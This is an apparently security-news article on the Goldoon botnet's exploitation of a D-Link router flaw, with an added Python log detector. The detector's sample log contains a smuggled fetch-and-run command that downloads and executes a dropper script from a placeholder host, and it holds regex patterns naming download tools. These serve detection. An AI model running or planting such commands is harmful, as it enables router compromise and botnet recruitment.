A newly identified botnet, known as Goldoon, has emerged with a focus on exploiting a long-standing vulnerability within D-Link routers. This vulnerability, designated as CVE-2015-2051, has been present for nearly ten years, affecting models like the D-Link DIR-645. The flaw permits remote attackers to execute arbitrary commands through specially crafted HTTP requests, with a severity score of 9.8 on the Common Vulnerability Scoring System (CVSS).
Cybersecurity researchers from Fortinet’s FortiGuard Labs have reported that if an attacker successfully compromises a target device, they can gain total control. This access enables the extraction of system information and communication with a command-and-control (C2) server, setting the stage for subsequent attacks, including distributed denial-of-service (DDoS) assaults. Observations indicate a surge in Goldoon’s botnet activity starting around April 9, 2024.
The exploitation process begins with the vulnerability being used to retrieve a dropper script from a remote server. This script downloads additional payloads tailored to various Linux architectures, including aarch64, arm, mips64 and others. Once launched, the payload acts as a downloader for the Goldoon malware, which then covers its tracks by deleting the dropper script.
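As an added illustration, not taken from the original article or from FortiGuard's report, the following Python detector scans access-log lines for the two observable stages described above: an inbound HTTP request that smuggles a download command together with shell metacharacters, and a single client pulling several architecture-named binaries from one host, which is the shape of a multi-architecture dropper. The log format, IP addresses, file names and the extra architecture names beyond the three the article lists are all assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access log (hypothetical data, not from the article):
# line 1 is benign, line 2 carries a percent-encoded download command plus
# shell metacharacters in a request parameter, lines 3-5 show one client
# fetching binaries named after several Linux architectures from one host.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Apr/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
198.51.100.7 - - [09/Apr/2024:10:01:09 +0000] "POST /admin/settings HTTP/1.1" 200 88 "wget%20http://203.0.113.9/dropper.sh;%20sh%20dropper.sh"
10.0.0.1 - - [09/Apr/2024:10:01:15 +0000] "GET http://203.0.113.9/bins/payload.aarch64 HTTP/1.1" 200 73216
10.0.0.1 - - [09/Apr/2024:10:01:16 +0000] "GET http://203.0.113.9/bins/payload.mips64 HTTP/1.1" 200 71000
10.0.0.1 - - [09/Apr/2024:10:01:17 +0000] "GET http://203.0.113.9/bins/payload.arm HTTP/1.1" 200 70120
"""

# The article names the first three; the rest are common Linux targets (assumption).
ARCHS = ("aarch64", "arm", "mips64", "mips", "x86_64", "i686")

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+)'
    r'(?: "(?P<extra>[^"]*)")?'
)
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|tftp)\b", re.IGNORECASE)
META_RE = re.compile(r"[;|`]|\$\(")
ARCH_RE = re.compile(r"[./_-](" + "|".join(ARCHS) + r")(?![A-Za-z0-9])")
HOST_RE = re.compile(r"^https?://([^/]+)/")


def parse_log(text):
    """Yield one dict per parseable line; lines that do not fit the format are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_injection_attempts(text):
    """Return source addresses whose request combines a download utility with
    shell metacharacters, the shape of a command-injection dropper fetch."""
    hits = []
    for rec in parse_log(text):
        # Percent-decode before matching: separators are routinely URL-encoded.
        probe = unquote(rec["url"] + " " + (rec["extra"] or ""))
        if DOWNLOAD_RE.search(probe) and META_RE.search(probe):
            hits.append(rec["src"])
    return hits


def find_multi_arch_downloads(text, threshold=2):
    """Return {(client, host): {arch, ...}} for clients that fetched binaries
    named after at least `threshold` different architectures from one host."""
    seen = defaultdict(set)
    for rec in parse_log(text):
        host = HOST_RE.match(rec["url"])
        arch = ARCH_RE.search(rec["url"])
        if host and arch:
            seen[(rec["src"], host.group(1))].add(arch.group(1))
    return {key: archs for key, archs in seen.items() if len(archs) >= threshold}


if __name__ == "__main__":
    print("injection attempts from:", find_injection_attempts(SAMPLE_LOG))
    for (client, host), archs in find_multi_arch_downloads(SAMPLE_LOG).items():
        print(f"{client} fetched {sorted(archs)} from {host}")
```

The second check is the more durable of the two: a request that mentions `curl` in a documentation path is not flagged because no metacharacter accompanies it, while a router that suddenly fetches binaries for several CPU architectures from one host is unusual regardless of how the initial request was encoded.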
In an attempt to thwart detection, any direct access to the command endpoint returns an amusing but unhelpful error message. Once established, Goldoon ensures persistence on the compromised host through multiple autorun methods and maintains communication with its C2 server, awaiting further commands.
Goldoon’s capabilities extend to around 27 methods for executing DDoS attacks across various protocols, such as DNS, HTTP, and ICMP. While the underlying vulnerability is not new, its exploitation illustrates a critical risk that can easily result in remote code execution.
The rise of such botnets highlights the ongoing evolution of cyber threats targeting Internet of Things (IoT) devices. As cybercriminals increasingly leverage compromised routers as an anonymization layer, they can hide their malicious activity within regular traffic patterns. According to a report by Trend Micro, these compromised devices are often repurposed for diverse criminal activities, including brute-force attacks and proxying for phishing sites.
This situation calls attention to the importance of robust security measures for routers, which frequently lack stringent monitoring and may not receive timely updates. The vulnerabilities inherent in these devices are especially concerning, as they can effectively become tools for widespread cybercriminal endeavors.
This incident is reflective of a broader trend where both criminal organizations and nation-state threat actors exploit similar vulnerabilities for strategic gain. Cyber adversaries may even utilize off-the-shelf botnets, contributing further to their anonymity and efficiency in orchestrating malicious actions.
In summary, Goldoon's exploitation of this flaw emphasizes the critical need for businesses to stay vigilant regarding the management and security of their IoT devices, as failure to do so can lead to severe repercussions, including significant operational disruptions. Given the sophistication of the tactics employed, understanding the relevant adversary techniques, as outlined in the MITRE ATT&CK framework, is crucial for formulating comprehensive defensive strategies against such pervasive threats.